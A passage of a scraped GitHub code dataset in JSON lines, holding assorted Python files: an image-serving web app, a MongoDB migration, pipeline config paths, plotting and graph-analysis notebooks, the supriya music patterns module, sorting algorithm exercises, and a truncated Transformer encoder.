print(len(moes))\n if not loading: threading.Thread(None, gen_moes).start()\n return image_to_data(Image.open(BytesIO(moe)))\n\n @get('/png')\n def get_png():\n response.content_type = 'image/png'\n while not moes: pass\n moe = moes.pop()\n print(len(moes))\n if not loading: threading.Thread(None, gen_moes).start()\n return moe\n\n def gen_moes():\n global loading\n loading = True\n while len(moes) < 25:\n btn.click()\n wait.until(lambda _: btn.is_enabled())\n moes.append(base64.b64decode(img.get_attribute('src')[22:]))\n print(len(moes))\n\n loading = False\n\n threading.Thread(None, gen_moes).start()\n run(host = '0.0.0.0', port = 1337)\nfinally:\n chrome.close()\n","repo_name":"Ivoah/Photon-Stuff","sub_path":"Moe.py","file_name":"Moe.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2958794253","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom main.settings import db\n\n# Update arists\nfor artist in db.artist.find():\n artist['selected_images'] = []\n\n if 'images' in artist:\n for image in artist['images']:\n if 'published' in image \\\n and image['published'] == True:\n artist['selected_images'].append(image)\n\n db.artist.update({'_id' : artist['_id'] }, artist)\n ## Update this artist on exhibitions as well\n db.exhibitions.update({\"artist._id\": artist['_id']}, {\"$set\": { \"artist\": artist }}, multi=True)\n ## Should update this artist on group exhibitions as well\n db.exhibitions.update({\"artists._id\": artist['_id']}, {\"$set\": {\"artists.$\": artist}}, multi=True)","repo_name":"colmoneill/Jason-Scraper","sub_path":"selected_images_migrator.py","file_name":"selected_images_migrator.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2847898897","text":"import os\n\nIs_Use_Reverse_Data=True\n\nBLAST_Process_Num=4\n\nProcess_Num=1\n\nSingularity_Container_Path='./src/Prof_Source/myprof.sif'\n\nD_or_S='D'\n\nMode=''\n\nDocker_Container_Name='myprof'\nDocker_Image_ID='7d9fe6723898'\n\nRaw_Dataset_file=''\n\n\nRaw_PDB_Path='./src/Raw_PDB/'\nWT_PDB_Path='./src/WT_PDB/'\nMUT_PDB_Path='./src/Mut_PDB/'\nWT_Fasta_Path='./src/WT_Fasta/'\nMUT_Fasta_Path='./src/MUT_Fasta/'\nWT_PSSM_Data_Path='./src/PSSM_Data/WT/'\nMUT_PSSM_Data_Path='./src/PSSM_Data/MUT/'\nWT_PSI_BLAST_Data_Path='./src/PSI_BLAST_Data/WT/'\nMUT_PSI_BLAST_Data_Path='./src/PSI_BLAST_Data/MUT/'\nWT_BLASTP_Data_Path='./src/BLASTP_Data/WT/'\nMUT_BLASTP_Data_Path='./src/BLASTP_Data/MUT/'\n\nTMP_Path='./src/TMP/'\n\nTable_Path='./src/Data_Table/'\nRes_Table_Name='data_table.txt'\n\nPred_Table_Path='./src/Pred_Table/'\nPred_Table_Name='pred_table.txt'\nPred_Res_Path='./src/Pred_Res/'\n\nIs_Pred=0\n\nPred_Raw_Dataset_Path='./src/Pred_Raw_Dataset/'\nPred_Raw_Dataset_Name='pred_raw.xls'\n\n\nRing_Path='./bin/ring-3.0.0/ring/bin/'\n\nFoldX_Path='./bin/FoldX_5.0/'\n\nFoldX_Name='foldx_20231231'\n\nRdkit_Path='./bin/rdkit_2023_3_1/'\n\nRdkit_Fdef_Name='BaseFeatures.fdef'\n\n\nFeatures_Table_Path='./src/Features_Table/'\nFeatures_Table_Name='features_table.csv'\n\nModel_Path='./models/'\n\n\n\n\n\nMSA_DB_Path=''\nMSA_DB_Name=''\n\n\n\nProf_Temp_Path='./src/Prof/'\n\nMain_Location=os.path.abspath('./')+'/'\nHome_Location=os.path.expandvars('$HOME')\n\nR_NMA_Path='./bin/R_NMA/'\nR_NMA_App_Name='NMA.R'\n\nDisEMBL_Path='./bin/DisEMBL_1_4/'\n\nBLAST_Path='./bin/ncbi_blast_2_13_0+/bin/'\n\n\n# WT_MSA_Path='./src/WT_MSA/'\nWT_MSA_Path=''\nSIFT_Path='./bin/sift6_2_1/'\n\n\n\n\nClean_Path='./bin/clean/'\n\nAAIndex1_Path='./src/AAindex/aaindex1'\nAAIndex2_Path='./src/AAindex/aaindex2'\nAAIndex3_Path='./src/AAindex/aaindex3'\n","repo_name":"geralt14/Features_Extraction","sub_path":"scripts/Global_Value.py","file_name":"Global_Value.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37915188125","text":"#!/usr/bin/python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport argparse\n\nif __name__ == '__main__':\n\t\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--pred', required = True)\n\tparser.add_argument('--gt', required = True)\n\targs = parser.parse_args()\n\n\tposes_est = np.loadtxt(args.pred)\n\tx_est = poses_est[:,3]\n\tz_est = poses_est[:,11]\n\n\tposes_gt = np.loadtxt(args.gt)\n\tx_gt = poses_gt[:,3]\n\tz_gt = poses_gt[:,11]\n\n\tplt.plot(x_est, z_est, 'b', label='Estimated trajectory')\n\tplt.plot(x_gt, z_gt, 'r', label='Ground truth trajectory')\n\tplt.axis('equal')\n\tplt.grid()\n\tplt.legend()\n\tplt.show()","repo_name":"morsingher/kitti_deep_vo","sub_path":"scripts/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"72994688809","text":"\"\"\"\nThe core pattern classes.\n\"\"\"\nimport abc\nimport inspect\nimport itertools\nimport operator\nimport random\nfrom collections.abc import Sequence\nfrom typing import Callable, Coroutine, Dict, Generator, Iterator, Optional\nfrom uuid import UUID\n\nfrom uqbar.objects import get_vars\n\nimport supriya.patterns\nfrom supriya.clocks import BaseClock, Clock, ClockContext, OfflineClock\nfrom supriya.contexts import Context, Node, Score\n\nfrom .events import CompositeEvent, Event, Priority\n\n\nclass Pattern(metaclass=abc.ABCMeta):\n ### CLASSMETHODS ###\n\n _rngs: Dict[int, Iterator[float]] = {}\n\n ### SPECIAL METHODS ###\n\n def __abs__(self):\n return UnaryOpPattern(\"abs\", self)\n\n def __add__(self, expr):\n return BinaryOpPattern(\"+\", self, expr)\n\n def __eq__(self, expr):\n self_values = type(self), get_vars(self)\n try:\n expr_values = type(expr), get_vars(expr)\n except AttributeError:\n expr_values = type(expr), expr\n return self_values == expr_values\n\n def __floordiv__(self, expr):\n return BinaryOpPattern(\"//\", self, expr)\n\n def __invert__(self):\n return UnaryOpPattern(\"~\", self)\n\n def __iter__(self) -> Generator[Event, bool, None]:\n should_stop = False\n state: Optional[Dict] = self._setup_state()\n iterator = self._iterate(state)\n try:\n expr = self._adjust_recursive(next(iterator), state=state)\n except StopIteration:\n return\n start_event, stop_event = self._setup_peripherals(state)\n if start_event:\n should_stop = (yield start_event) or should_stop\n if not should_stop:\n should_stop = (yield expr) or should_stop\n while True: # Exhaust iterator, even if scheduled to stop\n try:\n expr = self._adjust_recursive(\n iterator.send(should_stop), state=state\n )\n should_stop = (yield expr) or should_stop\n except StopIteration:\n break\n if stop_event:\n yield stop_event\n\n def __mod__(self, expr):\n return BinaryOpPattern(\"%\", self, expr)\n\n def __mul__(self, expr):\n return BinaryOpPattern(\"*\", self, expr)\n\n def __neg__(self):\n return UnaryOpPattern(\"-\", self)\n\n def __pos__(self):\n return UnaryOpPattern(\"+\", self)\n\n def __pow__(self, expr):\n return BinaryOpPattern(\"**\", self, expr)\n\n def __radd__(self, expr):\n return BinaryOpPattern(\"+\", expr, self)\n\n def __rmod__(self, expr):\n return BinaryOpPattern(\"%\", expr, self)\n\n def __rmul__(self, expr):\n return BinaryOpPattern(\"*\", expr, self)\n\n def __rpow__(self, expr):\n return BinaryOpPattern(\"**\", expr, self)\n\n def __rsub__(self, expr):\n return BinaryOpPattern(\"-\", expr, self)\n\n def __rtruediv__(self, expr):\n return BinaryOpPattern(\"/\", expr, self)\n\n def __rfloordiv__(self, expr):\n return BinaryOpPattern(\"//\", expr, self)\n\n def __sub__(self, expr):\n return BinaryOpPattern(\"-\", self, expr)\n\n def __truediv__(self, expr):\n return BinaryOpPattern(\"/\", self, expr)\n\n ### PRIVATE METHODS ###\n\n def _adjust(self, expr, state=None):\n return expr\n\n def _adjust_recursive(self, expr, state=None):\n if isinstance(expr, CompositeEvent):\n return CompositeEvent(\n [self._adjust(event, state=state) for event in expr.events],\n delta=expr.delta,\n )\n return self._adjust(expr, state=state)\n\n def _apply_recursive(self, procedure, *exprs):\n if all(not isinstance(x, Sequence) for x in exprs):\n return procedure(*exprs)\n coerced_exprs = [\n expr if isinstance(expr, Sequence) else [expr] for expr in exprs\n ]\n max_length = max(len(expr) for expr in coerced_exprs)\n for i, expr in enumerate(coerced_exprs):\n if len(expr) < max_length:\n cycle = itertools.cycle(expr)\n coerced_exprs[i] = [next(cycle) for _ in range(max_length)]\n return tuple(\n self._apply_recursive(procedure, *items) for items in zip(*coerced_exprs)\n )\n\n def _freeze_recursive(self, value):\n if isinstance(value, str):\n return value\n elif isinstance(value, Sequence) and not isinstance(value, Pattern):\n return tuple(self._freeze_recursive(_) for _ in value)\n return value\n\n def _get_rng(self):\n identifier = None\n try:\n # Walk frames to find an enclosing SeedPattern._iterate()\n frame = inspect.currentframe()\n while frame is not None:\n if (\n isinstance(frame.f_locals.get(\"self\"), SeedPattern)\n and frame.f_code.co_name == \"_iterate\"\n ):\n identifier = id(frame)\n break\n frame = frame.f_back\n finally:\n del frame\n if identifier in self._rngs:\n return self._rngs[identifier]\n return self._get_stdlib_rng()\n\n def _get_seeded_rng(self, seed: int = 1) -> Iterator[float]:\n while True:\n seed = (seed * 1_103_515_245 + 12345) & 0x7FFFFFFF\n yield float(seed) / 0x7FFFFFFF\n\n def _get_stdlib_rng(self) -> Iterator[float]:\n while True:\n yield random.random()\n\n @abc.abstractmethod\n def _iterate(self, state=None):\n raise NotImplementedError\n\n def _loop(self, iterations=None):\n if iterations is None:\n while True:\n yield True\n else:\n for _ in range(iterations):\n yield True\n\n def _setup_state(self) -> Optional[Dict]:\n return None\n\n def _setup_peripherals(self, state):\n return None, None\n\n ### PUBLIC METHODS ###\n\n def play(\n self,\n context: Context,\n *,\n at: Optional[float] = None,\n callback: Optional[\n Callable[\n [\"supriya.patterns.PatternPlayer\", ClockContext, Event, Priority],\n Optional[Coroutine],\n ]\n ] = None,\n clock: Optional[BaseClock] = None,\n quantization: Optional[str] = None,\n target_node: Optional[Node] = None,\n tempo: Optional[float] = None,\n until: Optional[float] = None,\n uuid: Optional[UUID] = None,\n ):\n from .players import PatternPlayer # Avoid circular import\n\n if isinstance(context, Score):\n clock = OfflineClock()\n at = at or 0.0\n elif clock is None:\n clock = Clock.default()\n player = PatternPlayer(\n pattern=self,\n context=context,\n clock=clock,\n callback=callback,\n target_node=target_node,\n uuid=uuid,\n )\n player.play(quantization=quantization, at=at, until=until)\n return player\n\n ### PUBLIC PROPERTIES ###\n\n @abc.abstractproperty\n def is_infinite(self):\n raise NotImplementedError\n\n\nclass BinaryOpPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, operator, expr_one, expr_two):\n self._operator = operator\n self._expr_one = self._freeze_recursive(expr_one)\n self._expr_two = self._freeze_recursive(expr_two)\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n expr_one = self.expr_one\n if not isinstance(expr_one, Pattern):\n expr_one = SequencePattern([expr_one], None)\n expr_one = iter(expr_one)\n expr_two = self.expr_two\n if not isinstance(expr_two, Pattern):\n expr_two = SequencePattern([expr_two], None)\n expr_two = iter(expr_two)\n operator = self._string_to_operator()\n for item_one, item_two in zip(expr_one, expr_two):\n yield self._apply_recursive(operator, item_one, item_two)\n\n def _string_to_operator(self):\n operators = {\n \"%\": operator.__mod__,\n \"*\": operator.__mul__,\n \"**\": operator.__pow__,\n \"+\": operator.__add__,\n \"-\": operator.__sub__,\n \"/\": operator.__truediv__,\n \"//\": operator.__floordiv__,\n }\n return operators[self.operator]\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def expr_one(self):\n return self._expr_one\n\n @property\n def expr_two(self):\n return self._expr_two\n\n @property\n def is_infinite(self):\n expr_one_is_infinite = (\n not isinstance(self.expr_one, Pattern) or self.expr_one.is_infinite\n )\n expr_two_is_infinite = (\n not isinstance(self.expr_two, Pattern) or self.expr_two.is_infinite\n )\n return expr_one_is_infinite and expr_two_is_infinite\n\n @property\n def operator(self):\n return self._operator\n\n\nclass UnaryOpPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, operator, expr):\n self._operator = operator\n self._expr = expr\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n expr = self.expr\n if not isinstance(expr, Pattern):\n expr = SequencePattern([expr], None)\n expr = iter(expr)\n operator = self._string_to_operator()\n for item in expr:\n yield self._apply_recursive(operator, item)\n\n def _string_to_operator(self):\n operators = {\n \"~\": operator.invert,\n \"-\": operator.__neg__,\n \"+\": operator.__pos__,\n \"abs\": operator.abs,\n }\n return operators[self.operator]\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def expr(self):\n return self._expr\n\n @property\n def is_infinite(self):\n return not isinstance(self.expr, Pattern) or self.expr.is_infinite\n\n @property\n def operator(self):\n return self._operator\n\n\nclass SeedPattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, pattern, seed=0):\n if not isinstance(pattern, Pattern):\n raise ValueError(f\"Must be pattern: {pattern!r}\")\n self._pattern = pattern\n self._seed = int(seed)\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n try:\n identifier = id(inspect.currentframe())\n rng = self._get_seeded_rng(seed=self.seed)\n self._rngs[identifier] = rng\n yield from self._pattern\n finally:\n del self._rngs[identifier]\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n return self._pattern.is_infinite\n\n @property\n def pattern(self):\n return self._pattern\n\n @property\n def seed(self):\n return self._seed\n\n\nclass SequencePattern(Pattern):\n ### INITIALIZER ###\n\n def __init__(self, sequence, iterations=1):\n if not isinstance(sequence, Sequence):\n raise ValueError(f\"Must be sequence: {sequence!r}\")\n if iterations is not None:\n iterations = int(iterations)\n if iterations < 1:\n raise ValueError(\"Iterations must be null or greater than 0\")\n self._sequence = self._freeze_recursive(sequence)\n self._iterations = iterations\n\n ### PRIVATE METHODS ###\n\n def _iterate(self, state=None):\n should_stop = False\n for _ in self._loop(self._iterations):\n for x in self._sequence:\n if not isinstance(x, Pattern):\n should_stop = (yield x) or should_stop\n else:\n iterator = iter(x)\n try:\n y = next(iterator)\n should_stop = (yield y) or should_stop\n while True:\n y = iterator.send(should_stop)\n should_stop = (yield y) or should_stop\n except StopIteration:\n pass\n if should_stop:\n return\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def is_infinite(self):\n if self._iterations is None:\n return True\n for x in self._sequence:\n if isinstance(x, Pattern) and x.is_infinite:\n return True\n return False\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/patterns/patterns.py","file_name":"patterns.py","file_ext":"py","file_size_in_byte":12320,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"3301123658","text":"#%%\nimport logging\nimport os\nimport time\nfrom pathlib import Path\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom scipy.cluster.hierarchy import linkage\nfrom scipy.spatial.distance import squareform\nfrom scipy.stats.mstats import gmean\nfrom sklearn.preprocessing import QuantileTransformer\nfrom umap import UMAP\nimport navis\nimport pymaid\nfrom giskard.plot import (\n dissimilarity_clustermap,\n screeplot,\n simple_scatterplot,\n simple_umap_scatterplot,\n stacked_barplot,\n)\nfrom giskard.stats import calc_discriminability_statistic\nfrom giskard.utils import careys_rule\nfrom graspologic.cluster import DivisiveCluster\nfrom graspologic.embed import AdjacencySpectralEmbed, LaplacianSpectralEmbed, selectSVD\nfrom graspologic.plot import pairplot\nfrom graspologic.utils import pass_to_ranks, remap_labels, symmetrize\nfrom src.data import load_metagraph\nfrom src.embed import JointEmbed, unscale\nfrom src.io import savefig\nfrom src.metrics import calc_model_liks, plot_pairedness\nfrom src.pymaid import start_instance\nfrom src.visualization import CLASS_COLOR_DICT, adjplot, set_theme, simple_plot_neurons\n\nimport SpringRank as sr\n\nmg = load_metagraph(\"G\")\nmg.make_lcc()\n\nmeta = mg.meta\n\n\n#%%\n\ngraph_types = [\"Gaa\", \"Gad\", \"Gda\", \"Gdd\"]\n\ngraphs = {}\n\nfor graph_type in graph_types:\n temp_mg = load_metagraph(graph_type)\n temp_mg = temp_mg.reindex(meta.index, use_ids=True)\n assert (temp_mg.meta.index.values == meta.index.values).all()\n graphs[graph_type] = temp_mg.adj\n\n#%%\nfrom graspologic.utils import get_lcc\nfrom scipy.stats import rankdata\n\nfor graph_type in graph_types:\n adj = graphs[graph_type]\n adj_lcc, inds = get_lcc(adj, return_inds=True)\n ranks = sr.get_ranks(adj_lcc)\n meta[f\"{graph_type}_sr_score\"] = np.nan\n meta[f\"{graph_type}_sr_rank\"] = np.nan\n meta.loc[meta.index[inds], f\"{graph_type}_sr_score\"] = ranks\n spring_rank = rankdata(ranks)\n meta.loc[meta.index[inds], f\"{graph_type}_sr_rank\"] = spring_rank\n\n#%%\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, print_out=False, **kws)\n\n\n#%%\nfrom scipy.stats import spearmanr, pearsonr\n\nset_theme()\nhue_key = \"simple_class\"\nvar = \"sr_score\"\nn_graphs = 4\n\nfig, axs = plt.subplots(n_graphs, n_graphs, figsize=(16, 16))\nfor i, row_graph in enumerate(graph_types):\n for j, col_graph in enumerate(graph_types):\n\n x_var = f\"{col_graph}_{var}\"\n y_var = f\"{row_graph}_{var}\"\n\n spearman_corr, _ = spearmanr(meta[x_var], meta[y_var], nan_policy=\"omit\")\n\n ax = axs[i, j]\n if i > j:\n sns.scatterplot(\n data=meta,\n x=x_var,\n y=y_var,\n hue=hue_key,\n palette=CLASS_COLOR_DICT,\n ax=ax,\n s=5,\n alpha=0.5,\n linewidth=0,\n legend=False,\n )\n text = ax.text(\n 0.98,\n 0.03,\n r\"$\\rho = $\" + f\"{spearman_corr:0.2f}\",\n transform=ax.transAxes,\n ha=\"right\",\n va=\"bottom\",\n color=\"black\",\n )\n text.set_bbox(dict(facecolor=\"white\", alpha=0.6, edgecolor=\"w\"))\n elif i == j:\n sns.histplot(\n data=meta,\n x=x_var,\n ax=ax,\n bins=50,\n element=\"step\",\n # color=\"grey\",\n hue=hue_key,\n palette=CLASS_COLOR_DICT,\n legend=False,\n stat=\"density\",\n common_norm=True,\n )\n else:\n ax.axis(\"off\")\n ax.set(xticks=[], yticks=[], xlabel=\"\", ylabel=\"\")\n if i == n_graphs - 1:\n ax.set(xlabel=f\"{col_graph}\")\n if j == 0:\n ax.set(ylabel=f\"{row_graph}\")\n stashfig(f\"{var}-pairwise\")\n# %%\n\nfor graph_type in graph_types:\n adj = graphs[graph_type]\n adj_lcc, inds = get_lcc(adj, return_inds=True)\n ranks = sr.get_ranks(adj_lcc)\n beta = sr.get_inverse_temperature(adj_lcc, ranks)\n print(beta)\n\n#%%\nA = adj_lcc.copy()\n\nranks = sr.get_ranks(A)\nbeta = sr.get_inverse_temperature(A, ranks)\n\n\ndef estimate_spring_rank_P(A, ranks, beta):\n H = ranks[:, None] - ranks[None, :] - 1\n H = np.multiply(H, H)\n H *= 0.5\n P = np.exp(-beta * H)\n P *= np.mean(A) / np.mean(P)\n return P\n\n\n#%%\nfrom graspologic.plot import heatmap\nfrom src.visualization import adjplot\n\n\n#%%\n\n\nfor graph_type in graph_types:\n adj = graphs[graph_type]\n A, inds = get_lcc(adj, return_inds=True)\n ranks = sr.get_ranks(A)\n beta = sr.get_inverse_temperature(A, ranks)\n P = estimate_spring_rank_P(A, ranks, beta)\n sort_inds = np.argsort(-ranks)\n\n fig, axs = plt.subplots(1, 2, figsize=(10, 5))\n adjplot(P[np.ix_(sort_inds, sort_inds)], ax=axs[0], cbar=False, title=r\"$\\hat{P}$\")\n adjplot(\n A[np.ix_(sort_inds, sort_inds)],\n plot_type=\"scattermap\",\n ax=axs[1],\n sizes=(1, 1),\n title=r\"$A$\",\n )\n stashfig(f\"{graph_type}-sr-prob-model\")\n\n#%%\nsort_inds = np.argsort(-ranks)\nfig, axs = plt.subplots(1, 2, figsize=(10, 5))\nadjplot(P[np.ix_(sort_inds, sort_inds)], ax=axs[0], cbar=False)\nadjplot(A[np.ix_(sort_inds, sort_inds)], plot_type=\"scattermap\", ax=axs[1])\n","repo_name":"neurodata/maggot_models","sub_path":"notebooks/207.0-BDP-rank-revisited.py","file_name":"207.0-BDP-rank-revisited.py","file_ext":"py","file_size_in_byte":5434,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13375776150","text":"############################\n# 정렬 #\n############################\n# 데이터를 특정한 기준에 따라 나열하는 것\n# 선택정렬\n# 가장 작은 것을 선택하여 맨 앞의 데이터와 바꾸는 과정을 반복\narr=[7,5,9,0,3,1,6,2,4,8]\nfor i in range(len(arr)):\n min_i=i\n for j in range(i+1,len(arr)):\n if arr[min_i]>arr[j]:\n min_i=j\n arr[i],arr[min_i]=arr[min_i],arr[i]\nprint(arr)\n# 삽입정렬\n# 데이터를 확인하여 필요한 경우에만 위치를 바꿈\narr=[7,5,9,0,3,1,6,2,4,8]\nfor i in range(len(arr)):\n for j in range(i,0,-1):\n if arr[j]<arr[j-1]:\n arr[j],arr[j-1]=arr[j-1],arr[j]\n else:\n break\nprint(arr)\n# 퀵 정렬\n# 기준 데이터(pivot)를 설정하여 기준보다 큰 데이터와 작은 데이터의 위치를 바꾸는 방법\narr = [5, 7, 9, 0, 3, 1, 6, 2, 4, 8]\ndef qu(arr, start, end):\n if start >= end:\n return\n pivot = start\n l = start + 1\n r = end\n while (l <= r):\n while (l <= end and arr[l] < arr[pivot]):\n l += 1\n while (r > end and arr[r] >= arr[pivot]):\n r -= 1\n if (l > r):\n arr[r], arr[pivot] = arr[pivot], arr[r]\n else:\n arr[l], arr[pivot] = arr[pivot], arr[l]\n qu(arr, start, r - 1)\n qu(arr, r + 1, end)\nqu(arr, 0, len(arr) - 1)\nprint(arr)\n# 계수정렬\n# 데이터 크기 범위가 제한되어 정수 형태로 표현할 수 있을때 사용. 매우 빠르게 동작\narr=[7,5,9,0,3,1,6,2,9,1,4,8,0,5,2]\ncnt=[0]*(max(arr)+1)\nfor i in range(len(arr)):\n cnt[arr[i]]+=1\nfor i in range(len(cnt)):\n for j in range(cnt[i]):\n print(i,end=' ')","repo_name":"ejcho3792/Algorithm","sub_path":"coding_test_with_python/CH0601_sort.py","file_name":"CH0601_sort.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2185053354","text":"test = int(input())\r\n\r\nfor i in range(test):\r\n floor = int(input()) + 1\r\n num = int(input())\r\n apartment = [[0]*num for i in range(floor)]\r\n people = 0\r\n\r\n for n in range(1, num+1): # 0층 num호에는 num명이 산다\r\n apartment[0][n-1] = n\r\n \r\n for n in range(floor):\r\n apartment[n][0] = 1 # floor층 0호에는 1명이 산다\r\n\r\n for n in range(1, floor):\r\n for m in range(1, num):\r\n apartment[n][m] = apartment[n][m-1] + apartment[n-1][m]\r\n\r\n print(apartment[floor-1][num-1])","repo_name":"rloldl-c/algorithm","sub_path":"백준/Bronze/2775. 부녀회장이 될테야/부녀회장이 될테야.py","file_name":"부녀회장이 될테야.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29151044430","text":"from keras_character_based_ner.src.matt.file_management import unpickle_large_file\nfrom typing import Dict\n\n# Examples in this file taken from\n# Deep Learning with Python\n# by François Chollet\n# Published by Manning Publications, 2017\n# Chapter 6 'Deep learning for text and sequences'\n\n\ndef graph_model_history(filepath, dest_file_name):\n \"\"\"\n Open a pickled `history` object created by a train (fit() invocation),\n and graph out the non-null-label accuracy, categorical accuracy, and loss\n on both training and validation datasets.\n :param filepath: path to the pickled history file.\n :param dest_file_name: a destination file name for the files. This name will\n be used 3 times, with words added to indicate which metric is shown in its graph.\n e.g. 'toy-model'\n :return:\n \"\"\"\n import matplotlib # type: ignore\n matplotlib.use('TkAgg')\n import matplotlib.pyplot as plt # type: ignore\n history_dict = unpickle_large_file(filepath)\n\n cat_acc = history_dict['categorical_accuracy']\n non_null_label_acc = history_dict['non_null_label_accuracy']\n loss = history_dict['loss']\n val_loss = history_dict['val_loss']\n val_cat_acc = history_dict['val_categorical_accuracy']\n val_non_null_label_acc = history_dict['val_non_null_label_accuracy']\n\n epochs = range(1, len(cat_acc) + 1)\n\n plt.figure(1)\n\n plt.plot(epochs, cat_acc, 'bo', label='Training acc')\n plt.plot(epochs, val_cat_acc, 'b', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.legend()\n\n plt.savefig('keras_character_based_ner/graphs/{}-acc.png'.format(dest_file_name))\n\n plt.figure(2)\n\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n\n plt.savefig('keras_character_based_ner/graphs/{}-loss.png'.format(dest_file_name))\n\n plt.figure(3)\n\n plt.plot(epochs, non_null_label_acc, 'bo', label='Non null label accuracy')\n plt.plot(epochs, val_non_null_label_acc, 'b', label='Validation Non null label accuracy')\n plt.title('Training and validation non null label accuracy')\n plt.legend()\n\n plt.savefig('keras_character_based_ner/graphs/{}-non-null-label-acc.png'.format(dest_file_name))\n","repo_name":"fatal-exception/project","sub_path":"keras_character_based_ner/src/matt/history.py","file_name":"history.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11480926702","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 6 12:44:46 2023\r\n\r\n@author: kisen\r\n\"\"\"\r\n\r\nimport itertools\r\n\r\nfrom similarity_models.model_classes import Siamese_LeNet5_var, \\\r\n Siamese_MobileNetV3_var, Siamese_ResNet18_var\r\n\r\n\r\nfrom torch import optim\r\n\r\nMODEL_HP_DICT = {\r\n 'epochs': [50],\r\n \r\n 'learningRate': [0.0005],\r\n \r\n 'batchSize': [128],\r\n \r\n 'percentOfPairs': [1.0],\r\n \r\n 'lossFunction': [\"Triplet\"],\r\n \r\n 'similarityFlag': [False],\r\n \r\n \r\n \r\n \r\n 'CylindricalModel': [True], 'model': [Siamese_LeNet5_var], \r\n \r\n \r\n \r\n \r\n 'optimizer': [optim.Adam]\r\n}\r\n\r\n\r\n# Create a list of all possible combinations of hyperparameters\r\nMODEL_HP = list(itertools.product(*MODEL_HP_DICT.values()))\r\n\r\nMODEL_HP_LIST = []\r\n\r\n# Loop over each combination of hyperparameters\r\nfor hyperparams in MODEL_HP:\r\n \r\n # Converts the combination back to a dictionary, and stores them in a list\r\n MODEL_HP_LIST.append(dict(zip(MODEL_HP_DICT.keys(), hyperparams)))","repo_name":"kisen123/mastersthesis","sub_path":"mastersthesis/hyperparameters/MODEL_HPs.py","file_name":"MODEL_HPs.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75249547048","text":"\"\"\"Defines Transformer model in tf.keras API.\"\"\"\nimport tensorflow as tf\n\nimport utils\nfrom commons.tokenization import SOS_ID\nfrom commons.tokenization import EOS_ID\nfrom commons import beam_search\nfrom commons.layers import EmbeddingLayer\nfrom commons.layers import FeedForwardNetwork\nfrom commons.layers import Attention\n\n\nclass EncoderLayer(tf.keras.layers.Layer):\n \"\"\"The building block that makes the encoder stack of layers, consisting of an\n attention sublayer and a feed-forward sublayer.\n \"\"\"\n def __init__(self, hidden_size, num_heads, filter_size, dropout_rate):\n \"\"\"Constructor.\n\n Args:\n hidden_size: int scalar, the hidden size of continuous representation.\n num_heads: int scalar, num of attention heads.\n filter_size: int scalar, the depth of the intermediate dense layer of the\n feed-forward sublayer. \n dropout_rate: float scalar, dropout rate for the Dropout layers.\n \"\"\"\n super(EncoderLayer, self).__init__()\n self._hidden_size = hidden_size\n self._num_heads = num_heads\n self._filter_size = filter_size\n self._dropout_rate = dropout_rate\n\n self._mha = Attention(hidden_size, num_heads, dropout_rate)\n self._layernorm_mha = tf.keras.layers.LayerNormalization() \n self._dropout_mha = tf.keras.layers.Dropout(dropout_rate)\n\n self._ffn = FeedForwardNetwork(hidden_size, filter_size, dropout_rate)\n self._layernorm_ffn = tf.keras.layers.LayerNormalization()\n self._dropout_ffn = tf.keras.layers.Dropout(dropout_rate)\n\n def call(self, inputs, padding_mask, training):\n \"\"\"Computes the output of the encoder layer.\n\n Args:\n inputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n input source sequences.\n padding_mask: float tensor of shape [batch_size, 1, 1, src_seq_len], \n populated with either 0 (for tokens to keep) or 1 (for tokens to be \n masked).\n training: bool scalar, True if in training mode.\n\n Returns:\n outputs: float tensor of shape [batch_size, src_seq_len, hidden_size], the\n output source sequences.\n \"\"\"\n query = reference = self._layernorm_mha(inputs)\n outputs = self._mha(query, reference, padding_mask, training)\n ffn_inputs = self._dropout_mha(outputs, training=training) + inputs\n\n outputs = 